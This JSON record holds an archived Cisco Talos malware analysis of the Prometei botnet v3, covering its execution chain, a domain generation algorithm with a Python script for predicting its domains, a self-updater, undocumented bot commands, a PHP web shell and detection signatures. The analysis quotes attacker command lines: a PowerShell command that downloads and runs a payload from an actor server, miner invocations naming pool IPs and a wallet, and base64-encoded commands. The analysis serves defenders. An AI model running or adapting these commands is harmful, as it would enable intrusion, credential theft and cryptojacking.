{
	"id": "d24853e9-3c5e-47db-a1cd-92e40970a4b6",
	"created_at": "2026-04-06T00:13:56.241609Z",
	"updated_at": "2026-04-10T13:11:28.377648Z",
	"deleted_at": null,
	"sha1_hash": "296541075e3750d6171a4436c8a7862573ae943b",
	"title": "Prometei botnet improves modules and exhibits new capabilities in recent updates",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1053226,
	"plain_text": "Prometei botnet improves modules and exhibits new capabilities in\r\nrecent updates\r\nBy Andrew Windsor\r\nPublished: 2023-03-09 · Archived: 2026-04-05 13:30:10 UTC\r\nThursday, March 9, 2023 08:02\r\nThe Prometei botnet has continued its activity since Cisco Talos first reported on it in 2020. Since November\r\n2022, we have observed Prometei improving the infrastructure components and capabilities. More\r\nspecifically, the botnet operators updated certain submodules of the execution chain to automate processes\r\nand challenge forensic analysis methods.\r\nWe assess with high confidence that v3 of the Prometei botnet is of medium size, with more than 10,000\r\ninfected systems worldwide, based on data obtained by sinkholing the DGA domains over a period of one\r\nweek in February 2023.\r\nBased on open-source intelligence, the actors have also been actively spreading improved Linux versions\r\nof the Prometei bot, continuously improving the current version, v3.\r\nWe have observed previously undocumented functionality, including an alternative C2 domain generating\r\nalgorithm (DGA), a self-updating mechanism, and a bundled version of the Apache Webserver with a web\r\nshell that’s deployed onto victim hosts, improving the overall technical capabilities of the botnet.\r\nAdditionally, the bot’s targeting may have been influenced by the war in Ukraine. The only excluded\r\ncountry in the Tor configuration is Russia, as opposed to earlier variants, which also avoided exit nodes in\r\nother CIS countries.\r\nPrometei, a highly modular botnet with worm-like capabilities that primarily deploys the Monero cryptocurrency\r\nminer, has been continuously improved and updated since it was first seen in 2016, posing a persistent threat to\r\norganizations. Talos first analyzed this threat in our 2020 blog post, highlighting its large repertoire of modules,\r\nmultiple methods of spreading, and continuous development. 
In our initial analysis and current activity tracking\r\nthat began in November 2022, we observed Prometei deploying Windows-based tools and malware and other\r\nLinux versions observed by security researchers.\r\nTalos observed Prometei’s cryptocurrency mining and credential theft activity to be financially motivated and\r\ngeographically indiscriminate. Its infections are likely opportunistic, targeting vulnerable entities in all regions\r\nand industry verticals to support a higher yield of harvested credentials and mining of the Monero cryptocurrency.\r\nPrometei victimology\r\nWe assess with high confidence that the Prometei v3 botnet is of medium size, with approximately 10,000 infected\r\nsystems worldwide, based on data acquired by sinkholing the DGA domains over a period of one week in\r\nFebruary.\r\nhttps://blog.talosintelligence.com/prometei-botnet-improves/\r\nPage 1 of 13\n\nThe geographical distribution of infected systems shows a uniform distribution proportional to the population of\r\nthe countries, with traffic captured from 155 countries. As expected with a uniform distribution, the most populous\r\ncountries have the largest number of infected systems, with the exception of Brazil, Indonesia and Turkey\r\ndisplaying a higher proportion of infections compared to those countries’ populations.\r\nA single country that stands out is Russia, with a disproportionately smaller number of infections, accounting for\r\n0.31 percent of all infected systems, supporting our assessment of the bot’s targeting being influenced by the\r\nRussia-Ukraine conflict based on its Tor configuration.\r\nWe assess the Prometei threat remains ongoing and will evolve for the foreseeable future. Its common C2\r\ninfrastructure continues to show a steady stream of activity, while the operators consistently rotate its malware and\r\ncryptomining hosts. 
Their regular updating and expansion of Prometei’s modules demonstrate commitment and\r\ntechnical knowledge that will enable them to continue proliferating the botnet to new victims and adapting to new\r\ndefenses and protections. The noted addition of backdoor capabilities to sqhost.exe by our previous research and\r\nthe inclusion of a bundled web shell in our current observations could indicate the operators are adding persistence\r\nmeasures to keep Prometei active on targeted machines, or a gradual shift or expansion to other types of payloads\r\nand activity.\r\nUpdates to Prometei’s common execution chain demonstrate improved capabilities\r\nTalos’ analysis of the botnet’s execution chain revealed that, while some infrastructure components remain\r\nunchanged from our 2020 reporting, the Prometei operators have made modifications that automate component\r\nand infrastructure updating, impair defenders’ analysis, and further entrench the actor on victim machines. We\r\nobserved the execution chain and subsequent actions performed by the botnet were initiated by a malicious\r\nPowerShell command that downloaded the primary listening and execution module, referred to throughout as\r\n“sqhost.exe.” It generally resembles some form of the following:\r\ncmd /C echo 123\u003eC:\\Windows\\mshlpda32.dll\u0026powershell $p='C:\\windows\\zsvc.exe';(New-Object Net.WebClient).Downloa\r\nAs the above command illustrates, the primary module is downloaded from an actor-controlled server in an\r\nencrypted form through a simple XOR byte alteration pattern. Its initial location on the hard drive is\r\n“C:\\windows\\zsvc.exe” and is executed through the PowerShell cmdlet “Start-Process”.\r\nFollowing the primary module’s download, additional commands establish persistence on the victim machine and\r\nensure the bot can communicate with the C2 server. 
A firewall rule named “Secure Socket Tunneling Protocol\r\n(HTTP)” is created through the “netsh” command to add “C:\\Windows\\sqhost.exe” to the allowed programs list.\r\nPersistence is obtained by creating an automated system service named “UPlugPlay,” which executes sqhost.exe\r\nwith the argument “Dcomsvc”. The original downloaded file is then renamed from “zsvc.exe” to “sqhost.exe.”\r\nOnce the primary Prometei module is hooked into the victim’s system, the majority of its capabilities are derived\r\nfrom several additional components that are downloaded to the victim host and retrieved through additional\r\nPowerShell commands. This activity was observed immediately following the establishment of sqhost.exe on the\r\nsystem. Many of the rest of Prometei’s components are delivered and updated in bulk through 7-Zip archive files.\r\nThe bot first checks if the expected 7-Zip executable “7z.exe” and shared library “7z.dll” resources already exist\r\non the system. If not, the executable file and shared library are remotely downloaded from a C2 server.\r\nUsing a similar PowerShell-based command, the bot downloads a 7z archive named “std.7z,” which contains\r\nnumerous shared library files for some common development packages used by Prometei’s components, such as\r\nthe GCC compiler (libgcc), an asynchronous event processor (libevent), the .NET Security interface, and a .NET\r\nconnector to PostgreSQL (npgsql). 
It also contains the following primary support modules:\r\n“rdpCIip.exe”\r\n“miwalk.exe”\r\n“windrlver.exe”\r\n“nethelper2.exe” and “nethelper4.exe”\r\n“smcard.exe”\r\n“msdtc.exe”\r\nTalos observed the primary support modules in the above list, which have consistently been a part of previously\r\nobserved instances of the Prometei botnet, as well as a less frequently seen module named “bklocal.exe.” The file\r\n“rdpCIip.exe” (named with a capital ‘i’ rather than a lowercase ‘l’) acts as a spreader program through Server\r\nMessage Block (SMB) and is used alongside its partner component “miwalk.exe”, which is a version of Mimikatz\r\nused for credential harvesting. A remote desktop protocol (RDP)-based spreading module, “bklocal2.exe” and\r\n“bklocal4.exe”, exploits the BlueKeep vulnerability (CVE-2019-0708) that affects older versions of Windows.\r\nThis module has been deployed less frequently but can be observed being downloaded separately.\r\nThe bot attempts to spread via SSH through the “windrLver.exe” SSH client. The executables with the “nethelper”\r\nnames are .NET-based assemblies for lateral movement that attempt to locate and connect to any SQL servers\r\nfound in the network environment. Upon successful connection, the executables attempt to install sqhost.exe onto\r\nthe server. The final two modules, “smcard.exe” and “msdtc.exe”, deal with the bot’s communications over the Tor\r\nnetwork, with the C2’s Tor address represented by the hardcoded URL in sqhost.exe and “onion” TLD:\r\n“hxxps://gb7ni5rgeexdcncj[.]onion/cgi-bin/prometei.cgi”.\r\nThe actual cryptocurrency mining payload is also retrieved remotely as “srch.7z”, but is written to disk as\r\n“SearchIndexer.exe”. The PowerShell command that downloads SearchIndexer.exe is similar to the one that drops\r\nthe primary component sqhost.exe. 
First, a check is performed that identifies if the same 7-Zip components are\r\npresent on the system and downloads them if not. The encryption method to obfuscate SearchIndexer.exe does,\r\nhowever, differ. Rather than encrypting the payload through XOR byte manipulation, it is encrypted through its\r\nparent password-protected 7-Zip archive. The password “horhor123” is visible in the PowerShell command and\r\nremains unchanged from our previous reporting. The miner configuration attributes are provided by the C2\r\nthrough a downloaded text file named “desktop.txt”, written to disk at “C:\\Windows\\dell\\desktop.dat”.\r\nWe also observed a few actions related to the miner. The call to actually begin mining can be seen in\r\nSearchIndexer.exe’s invocation on the command line, which also contains the Monero wallet associated with the\r\nPrometei actor:\r\nsearchindexer.exe -o stratum+tcp://103.65.236[.]53:80 -u 4A1txQ9L8h8NqF4EtGsZDP5vRN3yTVKynbkyP1jvCiDajNLPepPbBd\r\nThe actor issues commands to replace the command template in desktop.dat with a newly identified base64-encoded\r\ncommand. Two commands we observed were:\r\npowershell.exe $d=[System.Convert]::FromBase64String('LW8gc3RyYXR1bSt0Y3A6Ly8yMjEuMTIwLjE0NC4xMDE6MzMzMyAtLWRvb\r\n“-o stratum+tcp://221.120.144[.]101:3333 --donate-level 1 -p x -u id”\r\nand\r\npowershell.exe $d=[System.Convert]::FromBase64String('LW8gc3RyYXR1bSt0Y3A6Ly8xNzcuNzMuMjM3LjU1OjgwIC0tZG9uYXRlLW\r\n“-o stratum+tcp://177.73.237[.]55:80 --donate-level 1 -p x -u id”\r\nThe purpose and usage of all of the submodules were analyzed more in-depth in Talos’ 2020 blog post and by\r\nsecurity firm Cybereason in April 2021. They are summarized above for the sake of brevity. 
For a lengthier\r\ntechnical breakdown of these components and commonly observed Prometei execution chain, we recommend\r\nreferring back to these reports.\r\nNewly identified TTPs show operators’ continuous efforts to improve the botnet\r\nTalos identified new Prometei TTPs that expand the botnet’s capabilities and, at the time of writing, have yet to be\r\nhighlighted in open-source reporting. This recent addition of new capabilities aligns with threat researchers’\r\nprevious assertions that the Prometei operators are continuously updating the botnet and adding functionality. In\r\nparticular, Talos has discovered and analyzed a domain generation algorithm previously unseen in Prometei, the\r\naddition of a self-updating mechanism, new bot commands that can be used and the deployment of a bundled\r\nversion of the Apache Webserver with a PHP-based web shell onto victim hosts.\r\nDomain-generating algorithm for alternative C2\r\nTalos observed a new functionality that generates pseudo-random-looking domains. A simple domain-generating\r\nalgorithm (DGA) is used to generate up to 48 new domains per day that can be used for command and control\r\n(C2) servers.\r\nThe domain name itself is generated from the string “xinchao”, followed by six pseudo-random characters based\r\non the current local date. Additionally, the suffix of the top-level domains (TLD) is rotated between .com, .net, and\r\n.org. For example, we observed some of the following used in nslookup calls within telemetry:\r\nxinchaodbcdbh[.]org\r\nxinchaodbcdbh[.]com\r\nxinchaoabcdcf[.]org\r\nxinchaocecclk[.]org\r\nxinchaocecclk[.]net\r\nWe have included a simple Python script to help with discovering domains that Prometei v3 will generate. 
The\r\nscript takes a date in ISO format as an input and generates 48 possible domains for that date.\r\nApart from the standard DNS resolver for the generated domains, the “nslookup” command was executed with a\r\npattern-generated domain name, as well as with a server parameter “8[.]8.8.8” in order to specifically use\r\nGoogle’s public DNS. This call is visible on the command line as follows:\r\nnslookup -type=all xinchaocecclk[.]com 8[.]8.8.8\r\nA side effect of this is that nslookup calls act as a timing delay tactic that's relatively obscure to general users\r\nauditing their command logs. When the aforementioned domains are used with the nslookup command, the lookup\r\nessentially causes a timeout when it is unable to resolve the IP address.\r\nSelf-updating mechanism\r\nAnother evolution of the Prometei botnet is what appears to be an expanded self-updating capability. The bot\r\nissues a PowerShell command with embedded base64-encoded bytes, which is written to the batch file in the bot’s\r\ncommon directory at “C:\\Windows\\dell\\walker_updater.cmd” and then executed. This batch file will run similar\r\nchecks as seen in the previous activity that looks for the presence of “sqhost.exe” and the 7-Zip utilities and\r\ndownloads them if they aren’t detected. The batch script also issues additional PowerShell commands to download\r\na 7z file from the C2 server named “update.7z”, which is encrypted with the common actor password\r\n“horhor123”. Its contents are extracted and another contained batch file, “install.cmd”, is executed.\r\nThe update.7z archive contains replications as well as potentially different variants of Prometei’s common\r\ncomponents, such as sqhost.exe, netwalker.exe, and the service configuration “uplugplay”, among others. 
It also\r\ncontains two 7-Zip archives named “updates1_new” and “updates2_new”, which are protected with a new\r\npassword string “xinchao123” similar in composition to the aforementioned DGA domain generation. Further\r\nextracting these archives yields duplicate and different versions of the shared library files and spreader programs,\r\ndepending on which version of the archive is downloaded. For example, in a later update call from a different C2,\r\nTalos observed a 32-bit and 64-bit version of the Mimikatz variant “miWalk” included, while some subsequent\r\ndownloads of the update archive only included the 64-bit version.\r\nThe install.cmd batch file, invoked by the parent batch file walker_updater.cmd, is a fairly straightforward delete-substitution update of the relevant files. In the samples analyzed, the script first attempts to kill the rdpCIip.exe\r\nand winDrLver.exe spreader programs. It then deletes all current versions of the target files on disk and then\r\nrenames the extracted versions, which carry a “_new” suffix in their filenames, to the names of\r\nthe deleted files, effectively supplanting them. Finally, the install.cmd script cleans up any remaining extracted\r\nfiles from update.7z not used in the update cycle.\r\nPreviously undocumented Prometei bot commands\r\nApart from the C2 commands that are already described in detail in other posts, version 3 of the Prometei bot\r\ncontains several previously undocumented commands that the adversary could use to control the infected system.\r\nCommand Functionality\r\nfchk Check if a file is locked by a process and the file’s owner.\r\nfget Upload a file to C2\r\nfdir Get current directory\r\ncall Execute a program, create pipes to redirect stdin and stdout for input and output.
\r\nsendstr Send a supplied argument string into the keyboard input buffer\r\ndclick Mouse double click on a screen position\r\nlclick Mouse left click on a screen position\r\nrclick Mouse right click on a screen position\r\nclipcopy Get clipboard data\r\nclipsend Set clipboard data\r\nwinr Press win+r, open run box\r\npresskey Press a virtual keyboard key\r\nfdel Delete file\r\nfsha256 Calculate sha256 checksum of a file\r\nThe execution flow for the main module is very similar to previous variants. The main body of the bot is\r\nencrypted and the initialization of the encryption keys is dependent on the content of an external file created prior\r\nto the main module execution. If the initialization is successful, the main body of the bot will be executed, and if it\r\nfails, a decoy functionality will be executed.\r\nSuccessful execution of the bot depends on the content of an external file.\r\nApache webserver/web shell\r\nFinally, Talos observed the Prometei bot dropping a compressed archive, named “AppServ180.zip”, which\r\ncontains a version of the Apache Web Server bundled with a simple PHP-based web shell. Similar to other\r\ncomponent downloads by Prometei, the PowerShell call that drops this piece checks for the existence of 7-Zip\r\nbefore downloading AppServ180.zip from an actor-controlled host. The script then creates the following\r\ndirectories: “C:\\ProgramData\\Microsoft\\AppServ” and “C:\\ProgramData\\Microsoft\\AppServ\\cgi-bin”.\r\nInstallation of Apache web server and the PHP web shell file.\r\nIn a separate PowerShell command, the PHP file, “C:\\ProgramData\\Microsoft\\AppServ\\www\\ssimple.php”, is\r\nrenamed to a new filename consisting of “Shell-” and 12 randomly generated alphanumeric characters plus\r\n“.php”. 
This PHP file contains the simple web shell code that receives base64-encoded commands executed\r\nthrough PHP’s “system” function and a file upload-copy ability.\r\nInstalled web shell PHP code.\r\nAn additional Windows service is created under the name “KtmRmSvc” consisting of an auto process start for the\r\nexecutable in the AppServ subdirectory “Apache2.2\\bin\\taskhost.exe”. Despite sharing the name of a common\r\nWindows system executable, this file is actually a renamed “httpd.exe”, which is the HTTP daemon for the\r\nApache Server. By renaming the Apache daemon to a common system file, it is highly likely that the actor\r\nmanaging Prometei is hoping to prevent system owners and admins from noticing a web server running on their\r\nhost through some simplistic obfuscation of the running process name. While the inclusion of the packaged web\r\nshell was observed in the activity starting on Nov. 19, 2022, the existence of the archive file itself was first seen in\r\nVirusTotal on March 3, 2021, when its only submission was provided by a user in Japan. Given the Prometei\r\nactor’s propensity to swap components in and out, as well as iteratively update them, it is probable that the actor\r\nmay have been testing their web shell and/or deploying it situationally in other infection attempts, but we do not\r\ncurrently have any direct evidence to confirm or refute this.\r\nPrometei targeting now only excludes Russia\r\nIn analyzing our updated version of Prometei’s Tor proxy, “msdtc.exe”, we observed this configuration has been\r\nrecently updated to only exclude Russia, a change potentially made in response to the Russia-Ukraine war. In\r\nCybereason’s 2021 reporting, their researchers suggested that Prometei could be Russia-based, as the actor had\r\nconfigurations that excluded Tor exit nodes from Russia, Ukraine, Belarus, and Kazakhstan. 
Our recent analysis\r\nnot only corroborates Cybereason’s assessment that the operators are Russia-based but highlights a shift in\r\nPrometei’s current observed behavior.\r\nMsdtc.exe Tor connection module contains configuration to exclude Russian exit nodes.\r\nPrior to Russia’s invasion of Ukraine, the actor avoided targeting Russia and many of its border states, whereas\r\nnow, they only avoid targeting Russia. This may indicate a desire to limit the infection of and/or communication to\r\nany Russian hosts by the botnet’s author, and that previously excluded border states are now fair game.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.\r\nCisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically\r\nand alerts users of potentially unwanted activity on every connected device.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.\r\nUmbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network. 
Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nThe following Snort SIDs can defend against this threat: 54610-54612 and 61426-61429.\r\nThe following ClamAV signatures are applicable to this threat:\r\nWin.Trojan.MSShellcode-6\r\nWin.Coinminer.Generic-7151250-0\r\nWin.Malware.Tgqv7oji-9939403-0\r\nWin.Trojan.Mimikatz-6466236-0\r\nWin.Trojan.Prometei-8977166-0\r\nATT\u0026CK Techniques\r\nResource Development\r\nT1584.005 Compromise Infrastructure: Botnet\r\nExecution\r\nT1059.001 Command and Scripting Interpreter: PowerShell\r\nT1569.002 System Services: Service Execution\r\nPersistence\r\nT1505.003 Server Software Component: Webshell\r\nEvasion\r\nT1027 Obfuscated Files or Information\r\nT1036 Masquerading\r\nT1070.004 Indicator Removal on Host: File Deletion\r\nT1140 Deobfuscate/Decode Files or Information\r\nT1562 Impair Defenses\r\nLateral Movement\r\nT1210 Exploitation of Remote Services\r\nCommand and Control\r\nT0884 Connection Proxy\r\nT1090.003 Proxy: Multi-hop Proxy\r\nT1105 Ingress Tool Transfer\r\nIndicators of Compromise\r\nIndicators of Compromise associated with this threat can be found here.\r\nPrometei DGA script\r\n#!/usr/bin/env python3\r\nfrom datetime import datetime\r\nimport sys\r\n\r\n\r\ndef genPrometeiDomains(basedate=None, basestring='xinchao'):\r\n    # Default to the current local date, resolved at call time rather than at import time.\r\n    if basedate is None:\r\n        basedate = datetime.now()\r\n    month = basedate.strftime(\"%m\")\r\n    day_year = basedate.strftime(\"%d%y\")\r\n    basedomain = ''\r\n    generateddomains = []\r\n    # Each digit of the DDYY string is shifted by 0x31, mapping '0'-'9' onto 'a'-'j'.\r\n    for i in range(len(day_year)):\r\n        basedomain = basedomain + chr(ord(day_year[i]) + 0x31)\r\n    # The month number (1-12) is mapped onto 'b'-'m'.\r\n    basedomain = basedomain + chr(int(month) + 0x61)\r\n    # 16 trailing letters ('a'-'p') across three TLDs give the 48 candidate domains per day.\r\n    for i in range(16):\r\n        for tld in ['.net', '.org', '.com']:\r\n            domain = basestring + basedomain + chr(i + 0x61)\r\n            generateddomains.append(domain + tld)\r\n    return '\\n'.join(generateddomains)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    try:\r\n        print(genPrometeiDomains(datetime.fromisoformat(sys.argv[1])))\r\n    except IndexError:\r\n        print(genPrometeiDomains())\r\n    except ValueError:\r\n        print(\"The date must be specified using the ISO format yyyy-mm-dd\")\r\nSource: https://blog.talosintelligence.com/prometei-botnet-improves/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.talosintelligence.com/prometei-botnet-improves/"
	],
	"report_names": [
		"prometei-botnet-improves"
	],
	"threat_actors": [],
	"ts_created_at": 1775434436,
	"ts_updated_at": 1775826688,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/296541075e3750d6171a4436c8a7862573ae943b.pdf",
		"text": "https://archive.orkl.eu/296541075e3750d6171a4436c8a7862573ae943b.txt",
		"img": "https://archive.orkl.eu/296541075e3750d6171a4436c8a7862573ae943b.jpg"
	}
}